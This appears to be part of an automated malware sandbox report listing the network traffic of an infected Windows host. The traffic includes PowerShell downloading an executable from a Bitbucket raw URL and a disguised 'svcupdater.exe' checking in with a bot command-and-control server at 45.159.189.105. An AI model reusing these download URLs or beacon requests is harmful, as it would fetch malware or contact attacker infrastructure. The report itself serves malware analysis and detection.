                                                                                                  Oct 4, 2024 19:13:23.495004892 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.495016098 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.495810032 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.495831966 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.495870113 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.495877028 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.495898962 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.495913029 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.496326923 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.496356010 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.496392965 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.496397972 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.496424913 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.496439934 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.497046947 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.497068882 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.497133017 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.497139931 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.497180939 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.498490095 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.498513937 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.498550892 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.498557091 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.498584986 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.498603106 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.583879948 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.583910942 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.583982944 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.584006071 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.584031105 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.584048986 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.584223986 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.584245920 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.584275961 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.584280968 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.584306002 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.584319115 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.584865093 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.584886074 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.584920883 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.584929943 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.584944963 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.584965944 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.585587025 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.585617065 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.585649967 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.585654020 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.585665941 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.585688114 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.586292028 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.586313009 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.586344957 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.586349964 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.586379051 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.586391926 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.587058067 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.587078094 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.587109089 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.587114096 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.587140083 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.587150097 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.588388920 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.588411093 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.588443041 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.588447094 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.588473082 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.588490963 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.589478016 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.589508057 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.589540958 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.589545012 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.589597940 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.589622021 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.674238920 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.674268961 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.674372911 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.674398899 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.674443960 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.674865007 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.674885988 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.674952984 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.674958944 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.674999952 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.675533056 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.675551891 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.675599098 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.675604105 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.675645113 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.676305056 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.676325083 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.676356077 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.676361084 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.676378012 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.676395893 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.677222967 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.677247047 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.677287102 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.677290916 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.677318096 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.677333117 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.677829027 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.677849054 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.677886009 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.677890062 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.677920103 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.677941084 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.678525925 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.678548098 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.678585052 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.678590059 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.678627014 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.678637981 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.679984093 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.680003881 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.680037022 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.680041075 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.680073977 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.680094004 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.765203953 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.765237093 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.765301943 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.765326977 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.765342951 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.765368938 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.765640974 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.765664101 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.765702009 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.765711069 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.765734911 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.765744925 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.766573906 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.766594887 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.766648054 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.766653061 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.766693115 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.767268896 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.767337084 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.767885923 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.767956972 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.768053055 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.768076897 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.768119097 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.768125057 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.768142939 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.768167973 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.768598080 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.768625021 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.768661022 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.768670082 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.768681049 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.768706083 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.769330025 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.769351006 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.769387960 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.769392967 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.769418955 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.769435883 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.770890951 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.770911932 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.770956039 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.770967960 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.770977974 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.771004915 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.855992079 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.856054068 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.856241941 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.856241941 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.856266022 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.856308937 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.856389999 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.856431007 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.856452942 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.856458902 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.856487036 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.856506109 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.857270002 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.857311010 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.857336044 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.857340097 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.857366085 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.857386112 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.858009100 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.858087063 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.858112097 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.858117104 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.858144045 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.858165026 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.858634949 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.858696938 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.858720064 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.858724117 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.858752012 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.858768940 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.859424114 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.859467030 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.859492064 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.859496117 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.859522104 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.859540939 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.859996080 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.860037088 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.860061884 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.860065937 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.860099077 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.860107899 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.861908913 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.861968040 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.861977100 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.861996889 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.862025023 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.862042904 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.947109938 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.947186947 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.947218895 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.947240114 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.947254896 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.947274923 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.947299004 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.947360992 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.947365999 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.947401047 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.947482109 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:23.947527885 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:23.947685957 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:58.174817085 CEST4973980192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:13:58.180110931 CEST804973945.159.189.105192.168.2.4
                                                                                                  Oct 4, 2024 19:13:58.180177927 CEST4973980192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:13:58.180351973 CEST4973980192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:13:58.185339928 CEST804973945.159.189.105192.168.2.4
                                                                                                  Oct 4, 2024 19:13:59.780472994 CEST804973945.159.189.105192.168.2.4
                                                                                                  Oct 4, 2024 19:13:59.781016111 CEST4973980192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:13:59.787276983 CEST4973980192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:13:59.792288065 CEST804973945.159.189.105192.168.2.4
                                                                                                  Oct 4, 2024 19:13:59.802254915 CEST4974080192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:13:59.807775974 CEST804974045.159.189.105192.168.2.4
                                                                                                  Oct 4, 2024 19:13:59.810719013 CEST4974080192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:13:59.810854912 CEST4974080192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:13:59.815968990 CEST804974045.159.189.105192.168.2.4
                                                                                                  Oct 4, 2024 19:14:01.487971067 CEST804974045.159.189.105192.168.2.4
                                                                                                  Oct 4, 2024 19:14:01.488048077 CEST4974080192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:14:01.488142014 CEST4974080192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:14:01.492988110 CEST804974045.159.189.105192.168.2.4
                                                                                                  Oct 4, 2024 19:14:55.842169046 CEST5000780192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:14:55.847628117 CEST805000745.159.189.105192.168.2.4
                                                                                                  Oct 4, 2024 19:14:55.847707033 CEST5000780192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:14:55.861872911 CEST5000780192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:14:55.866754055 CEST805000745.159.189.105192.168.2.4
                                                                                                  Oct 4, 2024 19:14:57.437105894 CEST805000745.159.189.105192.168.2.4
                                                                                                  Oct 4, 2024 19:14:57.437284946 CEST5000780192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:14:57.437643051 CEST5000780192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:14:57.442526102 CEST805000745.159.189.105192.168.2.4
                                                                                                  Oct 4, 2024 19:14:57.463434935 CEST5000880192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:14:57.468627930 CEST805000845.159.189.105192.168.2.4
                                                                                                  Oct 4, 2024 19:14:57.468739986 CEST5000880192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:14:57.468914986 CEST5000880192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:14:57.473854065 CEST805000845.159.189.105192.168.2.4
                                                                                                  Oct 4, 2024 19:14:59.158466101 CEST805000845.159.189.105192.168.2.4
                                                                                                  Oct 4, 2024 19:14:59.158696890 CEST5000880192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:14:59.158795118 CEST5000880192.168.2.445.159.189.105
                                                                                                  Oct 4, 2024 19:14:59.163624048 CEST805000845.159.189.105192.168.2.4

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Oct 4, 2024 19:13:17.776415110 CEST6077653192.168.2.41.1.1.1
                                                                                                  Oct 4, 2024 19:13:17.784015894 CEST53607761.1.1.1192.168.2.4

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Oct 4, 2024 19:13:17.776415110 CEST192.168.2.41.1.1.10xc95aStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Oct 4, 2024 19:13:17.784015894 CEST1.1.1.1192.168.2.40xc95aNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                  Oct 4, 2024 19:13:17.784015894 CEST1.1.1.1192.168.2.40xc95aNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                  Oct 4, 2024 19:13:17.784015894 CEST1.1.1.1192.168.2.40xc95aNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • bitbucket.org
                                                                                                  • 45.159.189.105

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.44973945.159.189.105807904C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 4, 2024 19:13:58.180351973 CEST74OUTGET /bot/regex HTTP/1.1
                                                                                                  Host: 45.159.189.105
                                                                                                  Cache-Control: no-cache


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.44974045.159.189.105807904C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 4, 2024 19:13:59.810854912 CEST163OUTGET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1
                                                                                                  Host: 45.159.189.105
                                                                                                  Cache-Control: no-cache


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.45000745.159.189.105807904C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 4, 2024 19:14:55.861872911 CEST74OUTGET /bot/regex HTTP/1.1
                                                                                                  Host: 45.159.189.105
                                                                                                  Cache-Control: no-cache


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.45000845.159.189.105807904C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 4, 2024 19:14:57.468914986 CEST163OUTGET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1
                                                                                                  Host: 45.159.189.105
                                                                                                  Cache-Control: no-cache


                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.449730185.166.143.494437520C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-04 17:13:18 UTC133OUTGET /5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe HTTP/1.1
                                                                                                  Host: bitbucket.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-04 17:13:18 UTC4027INHTTP/1.1 200 OK
                                                                                                  Date: Fri, 04 Oct 2024 17:13:18 GMT
                                                                                                  Content-Type: application/x-msdos-program
                                                                                                  Content-Length: 208896
                                                                                                  Server: AtlassianEdge
                                                                                                  Content-Disposition: attachment
                                                                                                  Vary: Authorization, Accept-Language, Origin
                                                                                                  Cache-Control: s-maxage=900, max-age=900
                                                                                                  Last-Modified: Fri, 13 Jan 2023 16:15:26 GMT
                                                                                                  Etag: "f86a21d93d1512100b4e770b711578bd"
                                                                                                  X-Used-Mesh: False
                                                                                                  Content-Language: en
                                                                                                  X-View-Name: bitbucket.apps.repo2.views.filebrowse_raw
                                                                                                  X-Dc-Location: Micros-3
                                                                                                  X-Served-By: cb62c73099d7
                                                                                                  X-Version: 8e66bccd2be3
                                                                                                  X-Static-Version: 8e66bccd2be3
                                                                                                  X-Request-Count: 3686
                                                                                                  X-Render-Time: 0.08218693733215332
                                                                                                  X-B3-Traceid: f1df42db292e4290aaad5c0ec7394b29
                                                                                                  X-B3-Spanid: 66db5b712a9b74dc
                                                                                                  X-Frame-Options: SAMEORIGIN
